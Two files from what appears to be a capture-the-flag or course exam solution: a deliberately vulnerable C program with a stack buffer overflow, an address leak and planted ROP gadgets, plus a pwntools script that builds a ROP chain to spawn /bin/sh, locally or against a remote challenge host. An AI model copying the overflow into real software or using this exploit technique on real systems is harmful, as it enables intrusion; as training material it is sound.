File: finals/sols/expl/2.c
#include <stdio.h>

char banner[] = "________________________\n"
                "|.----------------------.|\n"
                "||                      ||\n"
                "||                      ||\n"
                "||     .-\"````\"-.       ||\n"
                "||    /  _.._    `\\     ||\n"
                "||   / /`    `-.   ; . .||\n"
                "||   | |__  __  \\   |   ||\n"
                "||.-.| | e`/e`  |   |   ||\n"
                "||   | |  |     |   |'--||\n"
                "||   | |  '-    |   |   ||\n"
                "||   |  \\ --'  /|   |   ||\n"
                "||   |   `;---'\\|   |   ||\n"
                "||   |    |     |   |   ||\n"
                "||   |  .-'     |   |   ||\n"
                "||'--|/`        |   |--.||\n"
                "||   ;    .     ;  _.\\  ||\n"
                "||    `-.;_    /.-'     ||\n"
                "||         ````         ||\n"
                "||______________________||\n"
                "'------------------------'\n";

void functions_go_brrrr() {
  char buffer[23];
  puts(banner);
  printf("Do you remember how to roproprop... exec /bin/sh");
  puts("");
  fgets(buffer, 800, stdin);
}

int main(void) {
  setbuf(stdout, NULL);
  printf("want a leak: %p\n", functions_go_brrrr);
  functions_go_brrrr();
}

void _() {
  __asm__("int3;"
          "ret;"

          "mov eax, 0;"
          "mov edx, 0;"
          "ret;"

          "xor ecx, ecx;"
          "ret;"

          "pop ebx;"
          "ret;"

          "int 0x80;"
          "ret;"

          "add eax, 1;"
          "ret;");
}

File: finals/sols/expl/2.py
from pwn import *

PROGNAME = "./monalisa"
REMOTEIP = "plsdonthaq.me"
REMOTEPORT = 2

if args.REMOTE:
    p = remote(REMOTEIP, REMOTEPORT)
    e = ELF(PROGNAME)
else:
    p = process(PROGNAME)
    e = p.elf

gadget = lambda x: p32(next(e.search(asm(x, os='linux', arch=e.arch))))

#Leak main addr
p.recvuntil("0x")
leak = int(p.recvline(), 16) - e.symbols["functions_go_brrrr"]
e.address = leak
log.info("Base is 0x%x" % e.address)

p.recvuntil("roproprop...")

# roproprop
payload = 27 * b"A"
payload += gadget("xor ecx, ecx; ret")
payload += gadget("mov eax, 0; mov edx, 0; ret")

payload += gadget("pop ebx; ret") + p32(next(e.search(b"/bin/sh")))

payload += gadget("add eax, 1; ret") * 0xb

payload += gadget("int 0x80; ret;")
p.sendline(payload)
p.interactive()
